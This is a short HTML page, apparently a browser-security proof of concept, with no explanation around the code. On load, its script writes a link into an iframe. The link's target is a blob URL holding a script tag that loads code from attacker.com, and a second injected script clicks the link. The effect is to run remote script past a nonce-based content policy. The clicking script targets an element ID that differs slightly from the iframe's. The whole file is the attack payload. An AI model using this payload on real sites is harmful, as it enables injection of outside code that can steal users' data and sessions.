<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGycRhWGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGycRhWGGGGG.onload=_=>GGGGGycRhWGGGGG.contentDocument.body.innerHTML+="<a id=a1 href=about:blank>click<\/a><script>a1.href=URL.createObjectURL(new Blob(['<script src=https://attacker.com/static/static.js><\\/script>'],{type:'text/html'}))<\/script><script>GGGGycRhWGGGG.click();<\/script>";GGGGGycRhWGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>